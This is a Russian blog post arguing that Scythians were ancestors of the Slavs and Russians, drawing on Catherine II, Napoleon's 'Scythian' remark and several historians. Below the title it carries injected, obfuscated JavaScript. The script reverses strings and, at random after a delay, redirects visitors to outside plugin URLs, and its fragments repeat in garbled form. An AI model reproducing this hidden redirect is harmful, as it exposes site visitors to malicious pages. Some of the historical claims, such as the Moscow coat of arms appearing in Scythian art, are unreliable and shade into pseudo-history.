Исследования Россия

Ещё о славянах-скифах


$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>

Как и следовало ожидать, по всей территории бывшего Советского Союза раскиданы многочисленные города, деревни, захоронения древних скифов. Их культура вызывает восхищение. Недавно в Лондоне состоялась выставка скифского золота, представленная Россией. Она во многом открыла глаза западного человека на глубокую и славную историю России. Приведу лишь один пример. Одним из наиболее часто встречающихся сюжетов в скифском искусстве является то, что нам известно сегодня как герб Москвы – всадник в характерной позе с копьем, готовый поразить дракона. И фигура всадника, и облачение, и фигура дракона — идентичны. Такого рода ракурс и сцены не встречаются в искусстве других народов, насколько я могу припомнить. На литых и чеканных произведениях искусства скифов ясно различим славянский тип лица и фигуры человека, воина, славянское облачение, лук, орнамент.

В русской истории и историографии и прежде бытовало мнение о генетической связи между русскими и скифами. В вышедших в 1787-ом году «Записках касательно русской истории» просвещённейшая императрица Екатерина Вторая писала про скифов так: «Дария, царя персидского, они со стыдом прогнали. Кир со всею армией против скифов удачи не имел. <…> Римлянам скифы никогда покорны не были. Один Александр Македонский имел успех противу скифов и заключил с ними союз. <…> Северные скифы одного языка со славянами. <…> У них были самовластные государи. Скифы терпеть не могли, чтоб другие народы сказывались старейшими. Они почитали дружбу и добродетели, любили неустрашимых, пренебрегали богатством, имели скотоводство, одевались зимою и летом в равную одежду. Были всегда на коне, оружие — лучшее их щегольство, суд отправляли, рассуждая здраво, письменного закона не имея, пороки наказывали строго. Храбрость и справедливость скифов в похвале были у соседних народов. <…> Жены езжали с мужами на войну».

Императрица Екатерина ничего от себя не придумывает – она лишь отражает общепринятое мнение. Действительно, вплоть до того времени западные европейцы звали русинов Руси – скифами, а поляки и русины Украины именовали себя потомками сарматов. В частности, в титуле некоторых гетманов Войска Запорожского была составляющая «князь Сарматии».

Говорить о точном заключении экспертов в области ДНК в отношении происхождения народов, наверное, является преждевременным. Но все же с каждым годом, по мере расширения исследовательской базы, исследования несомненно внесут свой вклад в дальнейшее понимание исторических путей. Тем не менее, уже имеющейся информации достаточно, чтобы со значительной степенью уверенности предположить генетическую связь между русскими и скифами. Грант Ли, историк-антрополог, считает, что за исключением монголо-татарского компонента русские происходят от скифов. Он пишет: «Если ставить вопрос с чисто научной точки зрения, с точки зрения генетики и ДНК (вместо, к примеру, языка), то у нас имеется достаточно данных в пользу того, что русские в целом, также как современные финны и поляки, восходят к скифам».[1]

Филипп Батлер в статье «Скифское прошлое русских: потерянные племена и потерянные происхождения» замечает, что скифское общество «отличалось чрезвычайно высокой культурой, которая во многом являлась уникально русской». Мифы скифов – по сути, ранние варианты славянской мифологии. Так, известнейшие славянские мифы о трех братьях-основателях народа: а) Скиф, Рус и Словен; б) Чех, Лех и Рус; в) Кий, Щек и Хорив имеют свою скифскую параллель. Это- легенда о трех братьях Липоксае, Арпоксае и Колоксае. В их царствование с небес пали 4 дара: плуг, ярмо, секира и чаша, что соответствует устроению скифского (да и древнерусского) общества: плуг – орудие тружеников, ярмо – хозяев, секира – витязей, обрядовая чаша – волхвов.

Таким образом, самоназвание, имена, вера и сказания скифов, а также и сарматов, которых от скифов отличает только говор, подтверждают, что в среде скифов было достаточное количество праславян. И, если трудно говорить о скифах, как о непосредственных славянах, то, они, безусловно, стали субстратом (частью) великого Рода Славных, а их [скифов] культура имеет яркие праславянские признаки.

Академик Б.Рыбаков, исходя из сравнения самоназвания скифов и россиян, говорит о безусловном присутствии славян в составе народа, который назван во многих источниках на греческий манер – скифами. Историк Л.Силенко, проведя анализ скифского наречия, показал, что имена скифских князей имеют славянское происхождение.

Интересно, что русская военная тактика многократно сравнивалась со скифской. Тактика отступления и контрнаступления. Это же была и тактика древних израильтян (Навин 8) – отступление, и последующее за ним контрнаступление.

«Скифская тактика» сыграла особую роль в Отечественной войне 1812 года. Считается, что впервые концепцию «скифской войны» военачальник Барклайде-Толли высказал в беседе с историком античности, знатоком Геродота Бартольдом Георгом Нибуром. Историк Евгений Тарле, отдавая право создания мифа французскому императору, писал: «Наполеон, очень бледный, но, уже взяв себя в руки после первого страшного волнения при внезапном пробуждении, смотрел в окно дворца на горящую Москву. „Это они сами поджигают. Что за люди! Это скифы!“ — воскликнул он. Затем добавил: „Какая решимость! Варвары! Какое страшное зрелище!“» Однако и русскому обществу аналогия была очевидна.

Так, уже в начале 1813 года сотрудник Барклая военный историк, полковник П. А. Чуйкевич, издает брошюру о войне, в которой прямо пишет, что Наполеон «забыл историю храбрых скифов, гибель Кира, постыдное бегство Дария, отступление Александра Македонского».

Итак, мы кратко коснулись связи между скифами и славянами. В последующих наших публикациях мы поговорим и о других народах, произошедших от скифского. Вас ждет много удивительного и интересного. Не уходите далеко, друзья.

[1] Источник

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

***

Поддержать служение

«Солёного радио», — сайт, YouTube канал, архив Яндекс Диска, — можно перечислив любую сумму на карту Сбер 4276 6600 1073 3772 (Дмитрий Александрович Б.). В сообщении можно написать просто «СР».

***

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Международный Телеграмм чат «Возвращение домой — общение православных и протестантов

You Might Also Like

1 Comment

Добавить комментарий для Легенда о двенадцати царях — Духовный Миллионщик Cancel Reply

Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.